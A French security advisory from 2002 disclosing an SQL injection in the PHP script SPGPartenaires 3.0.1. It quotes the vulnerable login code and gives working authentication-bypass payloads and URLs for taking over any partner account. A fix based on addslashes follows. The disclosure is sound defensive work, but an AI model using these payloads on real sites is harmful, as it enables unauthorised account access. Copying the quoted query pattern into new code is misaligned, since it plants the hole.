SPGpartenaires
						**************
Informations :
°°°°°°°°°°°°°°
Langage : PHP
Version : 3.0.1
Website : http://www.scripts-php-gratuits.com
Problème : Injection SQL

Developpement :
°°°°°°°°°°°°°°°
"SPGPartenaires est un script pour la gestion des partenaires."

La faille touche les fichiers du dossier /modif/, c'est-à-dire la partie reservée aux partenaires pour la gestion
de leur compte.
On voit d'abord dans le fichier d'identification, modif/ident.php :
------------------------------------------------------------------------------------------
[...]
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'";
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
header("location: index.php?msg=Identification+incorrecte+!");
}
else
{
setcookie("SPGP",$id."||".$pass,time()+84600,"");
header("location: index2.php");
}
[...]
------------------------------------------------------------------------------------------

Et dans les autres fichiers on peut (modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php) 
on peut voir :
-----------------------------------------------------------------------------------------------
<?
if(!isset($SPGP))
{
header("location: index.php?msg=Veuillez+vous+identifier+!");
}
else
{
$inf=explode("||",$SPGP);
[...]
$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'";
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
header("location: index.php?msg=Veuillez+vous+identifier+!");
}
[...]
-----------------------------------------------------------------------------------------------

La faille SQL est du même type dans tout ces fichier. On a une ligne de code du type :
$sql="SELECT id FROM SPGPartenaires WHERE id='".$variable1."' AND motdepasse='".$variable2."'";
La requête SQL étant :
SELECT id FROM SPGPartenaires WHERE id='$variable1' AND motdepasse='$variable2'
(ou "SELECT nomsite" dans modif/ident.php).
Si on donne comme valeur aux variables $variable1 et $variables2 : ' OR ''=', la requête deviendra :
SELECT id FROM SPGPartenaires WHERE id='' OR ''='' AND motdepasse='' OR ''=''
Comme ''='' retourne toujours vrai en SQL, on sera loggé en tant que membre.
Pour être loggé sur toutes les pages, en tant que, par exemple le site dont l'id est [ID], on pourra ou
se logger dans modif/ident.php avec une url du type 
http://[target]/modif/ident.php?id=[ID]&pass='%20OR%20''='


Ou bien rajouter après chacun des fichiers :
- modif/delete.php
- modif/index2.php
- modif/modif.php
- modif/modif_suite.php
la query_string ?SPGP=[ID]%7C%7C'%20OR%20''=', par exemple :
http://[target]/modif/index2.php?SPGP=25%7C%7C'%20OR%20''=' pour le compte dont l'id est 25.

Solution :
°°°°°°°°°°
Remplacer dans modif/ident.php la ligne
-----------------------------------------------------------------------------------------
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'";
-----------------------------------------------------------------------------------------
par
----------------------------------------------------------------------------------------------------------------
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".addslashes($id)."' AND motdepasse='".addslashes($pass)."'";
----------------------------------------------------------------------------------------------------------------
et dans les autres fichiers touchés la ligne
-----------------------------------------------------------------------------------------
$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'";
-----------------------------------------------------------------------------------------
par
-----------------------------------------------------------------------------------------------------------------
$sql="SELECT id FROM SPGPartenaires WHERE id='".addslashes($inf[0])."' AND motdepasse='".addslashes($inf[1])."'";
-----------------------------------------------------------------------------------------------------------------

Un patch est disponible sur http://www.phpsecure.org .

Credits :
°°°°°°°°°
Auteur : frog-m@n
E-mail : leseulfrog@hotmail.com
Website : http://www.phpsecure.org
Date : 17/12/02